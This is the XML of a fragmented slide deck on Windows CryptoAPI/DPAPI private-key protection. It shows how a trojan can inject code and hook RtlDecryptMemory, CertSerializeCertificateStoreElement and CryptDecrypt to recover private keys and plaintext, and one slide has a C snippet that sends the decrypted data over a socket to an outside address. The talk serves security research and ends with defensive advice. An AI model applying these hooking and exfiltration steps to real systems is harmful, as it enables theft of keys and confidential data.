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D085A-7EFB-4DA2-9501-7253C18834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4048560"/>
            <a:ext cx="87854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1B47F-22DD-4429-A9E9-0BC0A7E3B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341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40485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485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E5049-102A-4349-BA47-B52F32575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13413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13413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40485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40485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40485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5ACDB-293D-459A-8284-B44C9A00CE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42872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1440" y="1341360"/>
            <a:ext cx="42872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87854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1440" y="1341360"/>
            <a:ext cx="42872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79280" y="40485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DB7E1-E74F-47CA-8FFC-72BF608397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42872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440" y="1341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1440" y="40485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341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9280" y="4048560"/>
            <a:ext cx="87854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79280" y="4048560"/>
            <a:ext cx="87854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440" y="1341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79280" y="40485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1440" y="40485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49640" y="13413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0000" y="13413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79280" y="40485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49640" y="40485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20000" y="40485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31717-D6E6-4269-86DA-CAAA842322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42872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341360"/>
            <a:ext cx="42872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988D6-908B-4D65-AB07-46DFD841E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7E054-FC12-4182-BABF-012B16BBF7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87854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A288A-7EE3-4831-B1BB-B321639CED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341360"/>
            <a:ext cx="42872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40485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97518-23F3-4D49-817D-A0113D3711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42872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341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485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79108-318D-4F11-9F54-0A0A88D040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341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4048560"/>
            <a:ext cx="87854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939C0-12D5-4435-8CCF-56B6C0EF9F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66072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09920" y="6668640"/>
            <a:ext cx="213372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B5A3-5B54-49B6-B088-986350435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atch the key if you c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2004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rélien BORD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ric DETOIS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943600" y="6076800"/>
            <a:ext cx="316224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yptographic Provider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_RSA_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_RSA_A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_RSA_S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_DH_SCHANN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crosoft C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V_RSA_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icrosoft Base Cryptographic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icrosoft Enhanced/Strong Cryptographic Provi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V_RSA_A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icrosoft AES Cryptographic Provi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V_RSA_S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icrosoft RSA/Schannel Cryptographic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V_DH_S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icrosoft DSS and Diffie-Hellman/Schannel Cryptographic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PA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Protection Application Programming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OS-level data protection services to user an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based on encryption (3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idea : session keys are never stored but are reconstructed for the encryption or decryption operation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PA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on of a strong secret protected by the user’s password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(PKCS#5: PBKDF2, 3DES and SHA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d in the user’s prof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:\Documents and Settings\&lt;username&gt;\Application Data\Microsoft\Protect\&lt;sid user&gt;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92600" y="4724280"/>
            <a:ext cx="0" cy="122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24000" y="3284640"/>
            <a:ext cx="1319400" cy="64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PA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11880" y="4438800"/>
            <a:ext cx="2419200" cy="2158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API Bl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4440" y="2421000"/>
            <a:ext cx="1879560" cy="863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ter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78240" y="2421000"/>
            <a:ext cx="18777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 Some ran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16360" y="2421000"/>
            <a:ext cx="18795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pplication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ntr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43400" y="3933720"/>
            <a:ext cx="26524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861160" y="3284640"/>
            <a:ext cx="234720" cy="649080"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="808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84720" y="3213000"/>
            <a:ext cx="1727280" cy="720720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1386" h="600">
                <a:moveTo>
                  <a:pt x="1386" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1386" y="335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60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3280" y="2276640"/>
            <a:ext cx="2016360" cy="1152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5518080"/>
            <a:ext cx="202896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67160" y="5950080"/>
            <a:ext cx="3979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46960" y="5157720"/>
            <a:ext cx="20271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 Some random data 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46960" y="4797360"/>
            <a:ext cx="20271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ID Master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20000" y="2421000"/>
            <a:ext cx="18795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78120" y="3284640"/>
            <a:ext cx="0" cy="64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46960" y="5518080"/>
            <a:ext cx="2028600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff99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2880" y="1797120"/>
            <a:ext cx="28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ected with user credent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87280" y="2060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48360" y="2276640"/>
            <a:ext cx="2016360" cy="1152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29760" y="1492200"/>
            <a:ext cx="30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ed by the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885080" y="198900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yptProtect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OOL WINAPI CryptProtectData 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ATA_BLOB                  *pDataI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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>LPCWSTR                    szDataDesc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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>DATA_BLOB                  *pOptionalEntrop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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>PVOID                      pvReserve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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>CRYPTPROTECT_PROMPTSTRUCT  *pPromptStruc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WORD                      dwFlag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ATA_BLOB                  *pData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wFlags (CRYPTPROTECT_LOCAL_MACHINE)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ll local users can unprotect data. Machine keys are protected with this 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yptUnprotect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OOL WINAPI CryptUnprotectData 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ATA_BLOB                  *pDataI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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>LPCWSTR                    *ppszDataDesc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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>DATA_BLOB                  *pOptionalEntrop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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>PVOID                      pvReserve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808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>CRYPTPROTECT_PROMPTSTRUCT  *pPromptStruc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WORD                      dwFlag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ATA_BLOB                  *pData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PA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level of DP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ion/unprotection operations of data is transparent (flag </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr-FR" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>CRYPTPROTECT_PROMPTSTRUCT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 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u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user confirmation required for protection/unprotection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dditional user entropy required : user must submit password for protection/unprotection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ey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yptoAPI / DP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oftware protection under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injection and API H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ey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yptoAPI / DP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protection under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injection and API H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protection under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ion of private keys with Microsoft’s CSP is based on DP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levels of protection (low, medium, h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private keys are protected with DPAPI and stored in the user’s profi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:\Documents and Settings\&lt;username&gt;\Application Data\Microsoft\Crypto\RSA\&lt;sid user&gt;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chine private ke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:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys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protection under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ojan can read files (protected private keys) and use DPAPI functions to unprotect the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only (quiet, no message) if protection level is low (defaul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ith medium/high level protection? Perhaps with old school code injection and API H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elete the ke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remove your certificate, the associated private key is not delete on the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ey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yptoAPI / DP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protection under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de injection and API H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de injection and API Hoo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de injection in Win32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pen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irtualAlloc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riteProcess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reateRemote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trojan code is injected in the targe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sibility to hook interesting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de injection and API Hoo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PI Hooking in the targe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ave first API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tch API with a JMP to our injec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all saved instructions and original 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teresting API to h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tlDecryptMemory (SystemFunction041) in Advapi32.d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ertSerializeCertificateStoreElement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de injection and API Hoo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tlDecrypt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TSTATUS RtlDecryptMemory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VOID </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i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mory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LONG </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i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moryLength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LONG </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i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tionFlags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Courier New"/>
              </a:rPr>
              <a:t>Memory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is a pointer to encrypted data (private ke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f the function is successful the decrypted data (plain text private key) can be read at </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="fr-FR" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>Memory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de injection and API Hoo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ertSerializeCertificateStore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L WINAPI CertSerializeCertificateStoreElement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CCERT_CONTEXT pCertContex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WORD dwFlag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YTE* pbElemen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WORD* pcb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ypedef struct _CERT_CONTEXT {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DWORD dwCertEncodingType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BYTE* pbCertEncoded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DWORD cbCertEncoded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PCERT_INFO pCertInfo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HCERTSTORE hCertSto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CERT_CONTEXT,*PCERT_CONTEX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ypedef const CERT_CONTEXT *PCCERT_CONTEX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de injection and API Hoo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bCertEncoded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is a pointer to DER encoded certif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PI Hooking is effective to get X509 Certificate and its private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an’t catch the key, but data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, it is impossible to get the key (hardware exportation not possi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 is very easy to get the clear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he decryption operations use the CryptDecrypt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hook this function, you got the plaintext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ey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yptoAPI / DP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protection under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injection and API H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ryptDecry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BOOL WINAPI CryptDecrypt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HCRYPTKEY hK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HCRYPTHASH hHas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BOOL Fi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DWORD dwFla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BYTE* pbDa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DWORD* pdwDat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26120" y="3429000"/>
            <a:ext cx="3587040" cy="459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laintext after decry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427640" y="386064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Hooking Outl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628640"/>
            <a:ext cx="3168720" cy="460872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cry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3068640"/>
            <a:ext cx="14414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L/T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06560" y="3068640"/>
            <a:ext cx="14414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M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3859200"/>
            <a:ext cx="3024000" cy="504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ypto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4653000"/>
            <a:ext cx="3024000" cy="504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yptDecry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58920" y="5445000"/>
            <a:ext cx="1224000" cy="505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16000" y="3573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27280" y="3573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35280" y="4365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35280" y="5157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42920" y="4581360"/>
            <a:ext cx="1584360" cy="28764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4000" y="1557360"/>
            <a:ext cx="540072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KET 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kaddr_in sa_i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 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP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a_in.sin_family = AF_IN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a_in.sin_addr.s_addr =inet_addr("192.168.0.1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a_in.sin_port = htons(2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nect(s, (SOCKADDR*) &amp; sa_in, sa_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nd(s, (char *)pbData, (int)*pdwDataLen, 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osesocket(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ey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yptoAPI / DP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protection under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injection and API H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te storage on Windows is not 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ken and smartcard are better but beware the spyw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workstation compromise means no compromise of your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urity needs to be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and more PKI (Public Key Infrastructure) deploy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tificates used in digital signature, crypt/decrypt operations and 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protection in this game is cri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ecurity behind the use of this technology in Microsoft enviro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key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yptoAPI / DP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protection under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injection and API H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key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SA is an asymmetric-key crypto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uses two key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public k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d for verification or en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vate k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d for signing or de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public k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ust be widely distributed (X509 certifica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ivate k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ust be kept by the owner as a protected form (software or hardwa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ey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ryptoAPI / DP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protection under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injection and API H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yptoA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cryptographic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ryptographic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 fun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exchange fun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 encode/decod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rypt or decry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 stor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ed message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-level messag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yptographic Service Prov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mod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 the cryptographic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protection for private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CSP: based on DP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-party CSP: based on hardware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5:28:38Z</dcterms:created>
  <dc:creator>Aurel</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Aurel</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2005-10-16T21:02:25Z</dcterms:modified>
  <cp:revision>58</cp:revision>
  <dc:subject/>
  <dc:title>Diapositive 1</dc:title>
</cp:coreProperties>
</file>